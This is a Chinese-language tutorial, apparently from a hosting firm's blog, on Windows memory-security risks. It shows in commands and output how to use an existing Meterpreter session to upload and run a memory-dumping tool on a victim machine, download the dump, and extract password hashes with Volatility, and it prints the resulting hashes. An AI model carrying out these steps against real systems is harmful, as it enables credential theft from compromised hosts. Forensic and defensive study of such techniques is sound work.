客服中心
業務咨詢
技術支持
在線客服
解析Windows系統內存中的數據安全隱患
添加時間:2013-11-12 15:01:09
添加:
思海網絡
ManTech MDD(http://www.mantech.com/msma/MDD.asp))是遵循GPL協議發布的,MDD可以復制以下微軟操作系統內存的所有內容:WINDOWS 2000, Windows XP, Windows 2003 Server, Windows 2008 Server。
從ManTech網站下載MDD后,你必須使用命令行來運行MDD程序。
MDD命令行用法
| mdd -o 輸出文件名 |
例如:
| C:\tools\mdd> mdd -o memory.dd -> mdd -> ManTech Physical Memory Dump Utility Copyright (C) 2008 ManTech Security & Mission Assurance -> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w' This is free software, and you are welcome to redistribute it under certain conditions; use option `-c' for details. -> Dumping 255.48 MB of physical memory to file 'memory.dd'. 65404 map operations succeeded (1.00) 0 map operations failed took 21 seconds to write MD5 is: a48986bb0558498684414e9399ca19fc |
輸出文件通常都會涉及鏡像,MDD的功能僅限于復制物理內存,所以必須利用其他工具來分析內存鏡像。
這里我們使用Metasploit Meterpreter和MDD共同來完成下面的工作。
首先需要更新MDD。
| meterpreter > upload /root/mdd.exe . [*] uploading : /root/mdd.exe -> . [*] uploaded : /root/mdd.exe -> .\mdd.exe meterpreter > ls Listing: c:\ ============ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100777 /rwxrwxrwx 0 fil Thu Jan 01 00:00:00 +0000 1970 AUTOEXEC.BAT 100666 /rw-rw-rw- 0 fil Thu Jan 01 00:00:00 +0000 1970 CONFIG.SYS 40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 Documents and Settings 100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 IO.SYS 100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 MSDOS.SYS 100555 /r-xr-xr-x 45124 fil Thu Jan 01 00:00:00 +0000 1970 NTDETECT.COM 40555 /r-xr-xr-x 0 dir Thu Jan 01 00:00:00 +0000 1970 Program Files 40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 System Volume Information 40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 WINDOWS 100666 /rw-rw-rw- 194 fil Thu Jan 01 00:00:00 +0000 1970 boot.ini 100777 /rwxrwxrwx 95104 fil Thu Jan 01 00:00:00 +0000 1970 mdd.exe 100444 /r--r--r-- 222368 fil Thu Jan 01 00:00:00 +0000 1970 ntldr 100666 /rw-rw-rw- 402653184 fil Thu Jan 01 00:00:00 +0000 1970 pagefile.sys |
在被攻擊者的機器上執行MDD來獲得RAM信息
| meterpreter > execute -f "cmd.exe" -i -H Process 1908 created. Channel 2 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. c:\> mdd.exe -o memory.dd mdd.exe -o memory.dd -> mdd -> ManTech Physical Memory Dump Utility Copyright (C) 2008 ManTech Security & Mission Assurance -> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w' This is free software, and you are welcome to redistribute it under certain conditions; use option `-c' for details. -> Dumping 511.48 MB of physical memory to file 'memory.dd'. 130940 map operations succeeded (1.00) 0 map operations failed took 23 seconds to write MD5 is: be9d1d906fac99fa01782e847a1c3144 |
這里,我們只需要毫不費力的運行工具,所需的數據將會被捕獲下來。
| meterpreter > execute -f mdd.exe -a "-o demo.dd" Process 3436 created. |
我們需要證實內存鏡像已被捕獲。
| meterpreter > ls Listing: C:\ ============ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 537604934 fil Wed Dec 31 19:00:00 -0500 1969 92010NT_Disk2.zip 100777/rwxrwxrwx 0 fil Wed Dec 31 19:00:00 -0500 1969 AUTOEXEC.BAT 100666/rw-rw-rw- 0 fil Wed Dec 31 19:00:00 -0500 1969 CONFIG.SYS 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Config.Msi 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Documents and Settings 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 GetAd2 100666/rw-rw-rw- 15642 fil Wed Dec 31 19:00:00 -0500 1969 GetAd2.zip 100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 IO.SYS 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Inetpub 100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 MSDOS.SYS 100555/r-xr-xr-x 47580 fil Wed Dec 31 19:00:00 -0500 1969 NTDETECT.COM 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 PortQryV2 40555/r-xr-xr-x 0 dir Wed Dec 31 19:00:00 -0500 1969 Program Files 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 RECYCLER 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 System Volume Information 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 WINDOWS 100666/rw-rw-rw- 146 fil Wed Dec 31 19:00:00 -0500 1969 YServer.txt 100666/rw-rw-rw- 194 fil Wed Dec 31 19:00:00 -0500 1969 boot.ini 100666/rw-rw-rw- 133677056 fil Wed Dec 31 19:00:00 -0500 1969 demo.dd 100777/rwxrwxrwx 95104 fil Wed Dec 31 19:00:00 -0500 1969 mdd.exe 100444/r--r--r-- 233632 fil Wed Dec 31 19:00:00 -0500 1969 ntldr 100666/rw-rw-rw- 402653184 fil Wed Dec 31 19:00:00 -0500 1969 pagefile.sys 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 passwordcrackers 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 share 100777/rwxrwxrwx 869 fil Wed Dec 31 19:00:00 -0500 1969 update.exe Download memory dump using Meterpreter. meterpreter > download memory.dd . [*] downloading: memory.dd -> . [*] downloaded : memory.dd -> ./demo.dd meterpreter > |
我們已得到了.dd的本地映像,現在就可以利用http://forensiczone.blogspot.com/2009/01/using-volatility-1.html提供的操作步驟來獲取內存中的敏感信息。
附:
Volatility(https://www.volatilesystems.com/default/volatility)
$python volatility
| Volatile Systems Volatility Framework v1.3 Copyright (C) 2007,2008 Volatile Systems Copyright (C) 2007 Komoku, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. usage: volatility cmd [cmd_opts] Run command cmd with options cmd_opts For help on a specific command, run 'volatility cmd --help' Supported Internel Commands: connections Print list of open connections connscan Scan for connection objects connscan2 Scan for connection objects (New) datetime Get date/time information for image dlllist Print list of loaded dlls for each process dmp2raw Convert a crash dump to a raw dump dmpchk Dump crash dump information files Print list of open files for each process hibinfo Convert hibernation file to linear raw image ident Identify image properties memdmp Dump the addressable memory for a process memmap Print the memory map modscan Scan for modules modscan2 Scan for module objects (New) modules Print list of loaded modules procdump Dump a process to an executable sample pslist Print list of running processes psscan Scan for EPROCESS objects psscan2 Scan for process objects (New) raw2dmp Convert a raw dump to a crash dump regobjkeys Print list of open regkeys for each process sockets Print list of open sockets sockscan Scan for socket objects sockscan2 Scan for socket objects (New) strings Match physical offsets to virtual addresses (may take a while, VERY verbose) thrdscan Scan for ETHREAD objects thrdscan2 Scan for thread objects (New) vaddump Dump the Vad sections to files vadinfo Dump the VAD info vadwalk Walk the vad tree Supported Plugin Commands: cachedump Dump (decrypted) domain hashes from the registry hashdump Dump (decrypted) LM and NT hashes from the registry hivelist Print list of registry hives hivescan Scan for _CMHIVE objects (registry hives) lsadump Dump (decrypted) LSA secrets from the registry memmap_ex_2 Print the memory map printkey Print a registry key, and its subkeys and values pslist_ex_1 Print list running processes pslist_ex_3 Print list running processes usrdmp_ex_2 Dump the address space for a process Example: volatility pslist -f /path/to/my/file |
1. 運行hivescan得到所需偏移量
| $ python volatility hivescan -f demo.dd Offset (hex) 42168328 0x2837008 42195808 0x283db60 47598392 0x2d64b38 155764592 0x948c770 155973608 0x94bf7e8 208587616 0xc6ecb60 208964448 0xc748b60 234838880 0xdff5b60 243852936 0xe88e688 251418760 0xefc5888 252887048 0xf12c008 256039736 0xf42db38 269699936 0x10134b60 339523208 0x143cb688 346659680 0x14a99b60 377572192 0x16814b60 387192184 0x17141578 509150856 0x1e590688 521194336 0x1f10cb60 523667592 0x1f368888 527756088 0x1f74eb38 |
2. 運行hivelist
| $ python volatility hivelist -f demo.dd -o 0x2837008 Address Name 0xe2610b60 \Documents and Settings\Sarah\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat 0xe25f0578 \Documents and Settings\Sarah\NTUSER.DAT 0xe1d33008 \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat 0xe1c73888 \Documents and Settings\LocalService\NTUSER.DAT 0xe1c04688 \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat 0xe1b70b60 \Documents and Settings\NetworkService\NTUSER.DAT 0xe1658b60 \WINDOWS\system32\config\software 0xe1a5a7e8 \WINDOWS\system32\config\default 0xe165cb60 \WINDOWS\system32\config\SAM 0xe1a4f770 \WINDOWS\system32\config\SECURITY 0xe1559b38 [no name] 0xe1035b60 \WINDOWS\system32\config\system 0xe102e008 [no name] |
3. Password Hash (-y System Hive Offset)(-s SAM Hive
| $ python volatility hashdump -f demo.dd -y 0xe1035b60 -s 0xe165cb60 Administrator:500:08f3a52bdd35f179c81667e9d738c5d9:ed88cccbc08d1c18bcded317112555f4::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:ddd4c9c883a8ecb2078f88d729ba2e67:e78d693bc40f92a534197dc1d3a6d34f::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8bfd47482583168a0ae5ab020e1186a9::: phoenix:1003:07b8418e83fad948aad3b435b51404ee:53905140b80b6d8cbe1ab5953f7c1c51::: ASPNET:1004:2b5f618079400df84f9346ce3e830467:aef73a8bb65a0f01d9470fadc55a411c::: Sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: |
關鍵字:數據、安全、程序、系統、內存
新文章:
- CentOS7下圖形配置網絡的方法
- CentOS 7如何添加刪除用戶
- 如何解決centos7雙系統后丟失windows啟動項
- CentOS單網卡如何批量添加不同IP段
- CentOS下iconv命令的介紹
- Centos7 SSH密鑰登陸及密碼密鑰雙重驗證詳解
- CentOS 7.1添加刪除用戶的方法
- CentOS查找/掃描局域網打印機IP講解
- CentOS7使用hostapd實現無AP模式的詳解
- su命令不能切換root的解決方法
- 解決VMware下CentOS7網絡重啟出錯
- 解決Centos7雙系統后丟失windows啟動項
- CentOS下如何避免文件覆蓋
- CentOS7和CentOS6系統有什么不同呢
- Centos 6.6默認iptable規則詳解
